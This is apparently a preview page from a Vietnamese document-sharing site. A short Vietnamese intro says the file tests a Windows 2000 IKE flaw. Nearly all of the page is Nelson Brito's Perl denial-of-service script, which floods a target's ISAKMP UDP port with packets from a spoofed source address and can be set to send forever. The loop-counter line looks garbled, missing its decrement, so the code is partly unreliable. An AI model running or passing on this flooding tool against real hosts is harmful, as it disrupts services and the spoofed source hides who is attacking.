Windows 2000 IKE DoS Exploit Code : 1 lỗ hổng bảo mật lớn trong hệ điều hành Windows 2000 ppsx
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (85.25 KB, 2 trang )
Windows 2000 IKE DoS Exploit Code :
1 lỗ hổng bảo mật lớn trong hệ điều hành Windows 2000 cho phép kẻ tấn công
điều khiển từ xa làm tiêu hao dần số lượng CPU time. Sau đây là 1 đoạn Code
khai thác lỗi này, dùng để kiểm tra hệ thống của admin :
#!/usr/bin/perl -w :
use Socket;
use Net::RawIP;
use Getopt::Std;
getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print" $0 v.$ver b/ Nelson Brito / Independent Security Consultant ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
" -s* source address to spoof ",
" -d* destination address to attack ",
" -v IP Version (def: $v) ",
" -t IP Type of Service (TOS) (def: $t) ",
" -f IP fragementation offset (def: $f) ",
" -T IP Time to Live (TTL) (def: $T) ",
"UDP Options: ",
" -p destination port to attack (def: $p) ",
" -l packet length to send (def: $l) ",
" -r set randon data (def: ".") ",
"Generic: ",
" -n number of packets to send (def: $n) ",
" -L send packets forever ",
"Copyright © 2000 Nelson Brito . ";
while($n > 0){
$|=1;print".";$sp=int rand 65535;
$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;
$nb=new Net::RawIP({
ip=>
{
version=>$v,
tos=>$t,
ttl=>$T,
frag_off=>$f,
saddr=>$o{'s'},
daddr=>$o{'d'}
},
udp=>
{
source=>$sp,
dest=>$p,
len=>$l,
data=>$D
}
});
$nb->send;undef $nb;!$o{'L'}&&$n ;
}
print"Finish! ";
